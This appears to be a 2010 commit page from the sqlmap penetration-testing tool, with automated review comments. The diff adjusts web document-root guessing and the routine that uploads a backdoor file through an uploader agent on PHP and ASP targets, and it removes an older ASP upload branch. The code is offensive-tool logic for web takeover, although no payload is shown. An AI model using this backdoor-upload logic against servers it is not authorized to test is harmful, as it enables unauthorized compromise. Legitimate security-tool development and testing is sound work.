some changes regarding web takeover

Miroslav Stampar 2010-02-09 14:27:41 +00:00
parent 542b01993e
commit 00a23ace9a
2 changed files with 9 additions and 20 deletions


@ -232,6 +232,8 @@ def getDocRoot():
if kb.absFilePaths:
for absFilePath in kb.absFilePaths:
if directoryPath(absFilePath) == '/':
continue
absFilePath = normalizePath(absFilePath)
absFilePathWin = None
@ -271,20 +273,22 @@ def getDirs():
directories = set()
if kb.os == "Windows":
defaultDir = "C:/Inetpub/wwwroot/test/"
defaultDir = "C:/Inetpub/wwwroot/"
else:
defaultDir = "/var/www/test/"
defaultDir = "/var/www/"
if kb.absFilePaths:
infoMsg = "retrieved web server full paths: "
infoMsg += "'%s'" % ", ".join(path for path in kb.absFilePaths)
logger.info(infoMsg)
for absFilePath in kb.absFilePaths:
if absFilePath:
directory = directoryPath(absFilePath)
if isWindowsPath(directory):
directory = directory.replace('\\', '/')
if directory == '/':
continue
directories.add(directory)
else:
warnMsg = "unable to retrieve any web server path"
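Review bot: The root-directory skip is applied at different stages in the two functions. In getDocRoot, `directoryPath(absFilePath) == '/'` is compared before `normalizePath(absFilePath)` runs, while in getDirs `directory == '/'` is compared only after the backslash-to-slash replacement. A path that reduces to '/' only after normalization would presumably be skipped in one function and kept in the other, so I would compare the normalized form in both, e.g. `if directoryPath(normalizePath(absFilePath)) == '/': continue`, with a one-line comment saying why a bare root is not a usable candidate. The +/- markers are lost on this page, so which lines are new is inferred from the hunk headers, and both function bodies continue outside the hunks.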


@ -86,14 +86,14 @@ class Web:
return retVal
def __webFileStreamUpload(self, stream, destFileName, directory):
if self.webApi == "php":
if self.webApi in ("php", "asp"):
multipartParams = {
"upload": "1",
"file": stream,
"uploadDir": directory,
}
page = Request.getPage(url=self.webUploaderUrl, multipart=multipartParams)
page = Request.getPage(url=self.webUploaderUrl, multipart=multipartParams, raise404=False)
if "File uploaded" not in page:
warnMsg = "unable to upload the backdoor through "
@ -103,21 +103,6 @@ class Web:
else:
return True
elif self.webApi == "asp":
backdoorRemotePath = "%s/%s" % (directory, destFileName)
backdoorRemotePath = normalizePath(backdoorRemotePath)
backdoorContent = stream.read()
postStr = "f=%s&d=%s" % (backdoorRemotePath, backdoorContent)
page, _ = Request.getPage(url=self.webUploaderUrl, direct=True, post=postStr)
if "permission denied" in page.lower():
warnMsg = "unable to upload the backdoor through "
warnMsg += "the uploader agent on '%s'" % directory
logger.warn(warnMsg)
return False
else:
return True
elif self.webApi == "jsp":
return False
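Review bot: With `raise404=False` on the `Request.getPage(...)` call in `__webFileStreamUpload`, a missing uploader URL no longer raises, so `if "File uploaded" not in page:` becomes the only failure signal. What getPage returns in that case is not visible here; if it can be None, the membership test raises TypeError instead of reaching the warning, so `if not page or "File uploaded" not in page:` would be safer. The ASP branch shown in the second hunk (apparently removed) unpacks the result as `page, _ = Request.getPage(...)`, while this call assigns it directly, so it is worth confirming that the multipart path returns a plain string. The method body starts and ends outside the hunks shown.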